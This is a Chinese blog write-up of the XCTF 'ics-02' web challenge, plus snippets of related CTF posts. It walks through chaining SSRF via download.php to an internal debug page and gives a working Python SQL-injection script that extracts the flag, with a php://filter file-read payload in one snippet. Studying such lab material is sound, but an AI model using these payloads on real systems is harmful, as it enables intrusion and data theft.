攻防世界web高手进阶之ics-02

最新推荐文章于 2025-02-26 13:57:51 发布
最新推荐文章于 2025-02-26 13:57:51 发布
阅读量381 收藏 1
点赞数 1
分类专栏: CTF笔记 文章标签: python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45431855/article/details/120423808
版权

攻防世界web高手进阶之ics-02

进入文档中心页面,点击paper可以下载pdf文件,请求download.php,参数为dl

在这里插入图片描述
在这里插入图片描述
pdf文件内容为ssrf,可能为线索
接着扫一遍目录,发现了/secret目录
在这里插入图片描述

访问一下试试
在这里插入图片描述
分别访问

在这里插入图片描述
看到私密页面1,查看元素,填完表提交,到达私密页面2,元素有一个变量s,s=3时返回页面2
在这里插入图片描述

发现secret_debug.php无法访问
到这里就无头绪了,wp大法,利用download.php传参进行ssrf攻击
虽然只能下载pdf文件,但是下载一个不存在的文件的时候readfile函数还是会执行的。
根据secret参数带入secret_debug构造请求
http://111.200.241.244:64242/secret/secret_debug.php?s=3&txtfirst_name=a&txtmiddle_name=b&txtlast_name=c&txtname_suffix=d&txtdob=01/05/2000&txtdl_nmbr=1234&txtretypedl=1234
在这里插入图片描述
发现.pdf加在了s=3后面,&符号导致,所以进行url编码,服务器再解码,.pdf就会加到所有参数最后

在这里插入图片描述
还是有问题,.pdf加在最后一个参数后面会影响其值,所以在参数后面再加一个&,相当于隔断了pdf
在这里插入图片描述

注册成功。。注册的参数可以进行sql注入,大神的脚本:

import requests
import random
import urllib

url = ' http://111.200.241.244:64242//download.php'

# subquery = "database()"
# ssrfw
# subquery = "select group_concat(table_name) from information_schema.tables where table_schema='ssrfw'"
# etcYssrf,users
# subquery = "select group_concat(column_name) from information_schema.columns where table_name='cetcYssrf'"
# secretName,value
# subquery = "select secretName from cetcYssrf LIMIT 1"
# secretname -> flag
subquery = "select value from cetcYssrf LIMIT 1"
# value -> flag{cpg9ssnu_OOOOe333eetc_2018}

id = random.randint(1, 10000000)

dl = ('http://127.0.0.1/secret/secret_debug.php?' +
        urllib.parse.urlencode({
            "s": "3",
            "txtfirst_name": "A','b',("+subquery+"),'c'/*",
            "txtmiddle_name": "B",
            "txtLast_name": "C",
            "txtname_suffix": "D.",
            "txtdob": "*/,'01/10/2019",
            "txtdl_nmbr": id,
            "txtRetypeDL": id
            }) + "&")

r = requests.get(url, params={"dl": dl})
print(r.text)

知识点:
1.ssrf
2.sql注入

结束语

莫忘少年凌云志 曾许天下第一流

攻防世界 WEB ics-02
qq_41696858的博客
10-01 297
考的是sql注入,结合之前的ics系列,肯定要从唯一有用的a链接入手,发现文档中心可以进入,点进去,又发现一个a链接 <a href="download.php?dl=ssrf">paper. </a> 下下来download.php,打开可以发现pdf之类的头,那么就是个pdf,结合ssrf的提示,后面可能会有用 然后扫一波目录,发现/secrets目录 发现里面有secret_debug.php和secret.php两个文件,其中debug文件不能直接访问,那么ssrf大概就
攻防世界 web高手进阶区 8分题 ics-02
闵行小鱼塘
10-04 658
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是ics-02的writeup
攻防世界--ics-02
qq_46263951的博客
01-06 1093
初始页面,看到这种页面就比较头疼,无从下手 先来扫下目录 download会让我们下载一个ssrf的pdf文件 secret目录下包含着secret.php和secret_debug.php login页面显示
攻防世界-----ssrf me
最新发布
2301_76872222的博客
02-26 471
攻防世界--ssrf me 本地访问 python脚本编写
[wp] 攻防世界 ics-02
MercyLin的博客
09-29 2927
进去扫目录发现/secret 无法直接进入secret_debug.php 显示ip不对 点paper会向download.php传参,可以下载一个ssrf内容的pdf, 于是想到利用ssrf来访问secret_debug.php 发现参数s,fuzz一下,发现s=3时会有如下返回 经测试在此页面发现sql注入漏洞,进行注入得到flag,脚本如下: import requests impor...
【愚公系列】2023年06月 攻防世界-Webics-02
时光隧道
06-21 7032
SSRF(服务器端请求伪造)是一种攻击技术,攻击者通过构造恶意请求,欺骗服务器发起外部请求,获取服务器本应该不被直接访问的信息或服务。攻击者可利用 SSRF 进行一系列攻击,包括对内部资源进行扫描、窃取敏感信息、攻击内部系统等。SQL 注入是一种常见的 Web 攻击技术,攻击者通过在输入框等用户交互界面中注入 SQL 代码,进而控制数据库操作,例如读取、修改、删除等。攻击者可通过 SQL 注入进行窃取敏感信息、篡改数据,或直接攻击数据库服务器等。
攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
m0_46267075的博客
05-26 4853
尝试
攻防世界WEB进阶ics-05
harry_c的博客
08-24 2852
攻防世界WEB进阶ics-051、描述2、实操3、答案 1、描述 难度系数: 3星 题目来源: XCTF 4th-CyberEarth 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 题目场景: 点击获取在线场景 题目附件: 暂无 首先打开场景,进入系统设备维护中心,没有发现什么,查找到相关漏洞一个,查看源码: 2、实操 使用 http://111.198.29.45:449...
攻防世界web进阶ics-06
gongjingege的博客
07-09 1056
打开链接 到处点了点,发现只有题目描述里的报表中心可以点进去 发现id=1,改了几个数字,发现页面没有变化,看了看源代码,用开发者选项也没有发现,试了试burpsuite抓包,也没发现啥 到网上看了看各位大佬的wp,发现这个题得用burp suite爆破(触及到了我的盲区。。。),只能看着大佬的博客,一步步跟着来 抓包后发送给intruder,查看target是否正确,导入字典点击右上角的start attack,开始爆破(发现我的字典里没有2333,刚开始没成功,在字典里加入后才成),点击length自
攻防世界web进阶ics-05
gongjingege的博客
07-29 426
打开链接 看了看源代码,没发现啥,页面到处点点,只有设备维护中心可以进去 再点了一下云平台设备维护中心,发现url栏?page=index url栏看见page,考虑文件包含漏洞 读取index的源代码,参考大佬的wp,用php伪协议php://filter payload:?page=php://filter/read=convert.base64-encode/resource=index.php 得到一段base64,解码 https://tool.chinaz.com/tools/base64.
ics-02攻防世界 CTF
wuyaowangchuan的博客
11-30 602
进入环境 扫后台目录 发现/secret和一个index.php 访问index.php 点击paper之后下载文档 这个文档双击打不开 shell命令:xxd命令 用xxd打开 xxd download.php 但是在终端直接显示的话太多了,翻不到上面的 所以我就把他重定向到txt文件里面查看 第一行里面就说了这是一个pdf 打开之后这个文档说的是SSRF,猜测这个题目可能用到SSRF 回头看了一眼 paper的url是/download.php?dl=ssrf 接着再去访问secret.
ICS-02
weixin_52921802的博客
11-16 407
数字逻辑 一、MOS晶体管 三个引脚(电极),分别被称作“栅级”、“源级”,“漏极”。 标识方法 横线代表正极 下三角代表接地 n-MOS晶体管 如果在栅极接入2.9V电压,则在源极和漏极之间会产生一条通路,这时候n-MOS晶体管就等于是一根连通线(“闭路”)。如果栅极电压是0V,则源极和漏极之间断开,此时称为“开路” p-MOS晶体管 与n-MOS晶体管工作方式恰恰相反 CM..
xctf ics-02
weixin_51861515的博客
11-07 346
访问网址,打开文档中心,查看源代码。 发现 secure/default.php(没啥用) 和<a href="download.php?dl=ssrf">paper. </a> 会下载一个download.php文件。(浏览器的自解码机制,a标签的href属性会进行URL解码)。 打开看一下 没啥有用的信息。 可以用的信息太少了,dirsearch扫一下。 访问secret/ secret.php是一个注册页面,secret_deb...
攻防世界】十九 --- fakebook --- ssrf
qq_43168364的博客
12-29 631
题目 — fakebook 一、writeup 使用dirsearch扫描目录 flag应该在flag.txt文件中 访问robots.txt文件,得到了一个目录 下来了一个文件,user.php.bak。该文件先丢在这里等下再审计,主页没有任何发现,前端代码中没有提示,login.php 也没有找到可以利用的点(可以尝试:sql,xss,逻辑漏洞,写入日志文件,爆破) 来到join.php页面注册了一个admin用户 从首页可以访问到admin用户的页面,发现存在一个查询字符串,其有sql注入漏洞
攻防世界-web-ics-06--XCTF 4th-CyberEarth
Sea_Sand息禅
04-23 6390
进入index.php,发现可以传参,bp爆破,当id=2333时拿到flag
攻防世界ics-06
chy082的博客
07-01 243
首先进去之后乱点点,发现报表中心有东西 看见url后面id=1,初步判断是sql注入,结果后来发现啥也没有,所以就直接burp爆破id,发现2333处长度不一样 找到flag
攻防世界WEB进阶——Cat wp
weixin_42499640的博客
07-31 1202
首先打开题目是个发现是个云端测试 提示输入域名 先输个baidu.com 没反应 输入百度的ip 220.181.38.148 反馈了 PING 220.181.38.148 (220.181.38.148) 56(84) bytes of data. --- 220.181.38.148 ping statistics --- 1 packets transmitted, 0 receive...
攻防世界-web题型-2星难度汇总-个人wp
DamnVanish的博客
08-23 884
至此2星的靶场全部打完,个人认为catcat-new这道题最难,其次是supersqli,其它只要多花点时间和细节一点就可以
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值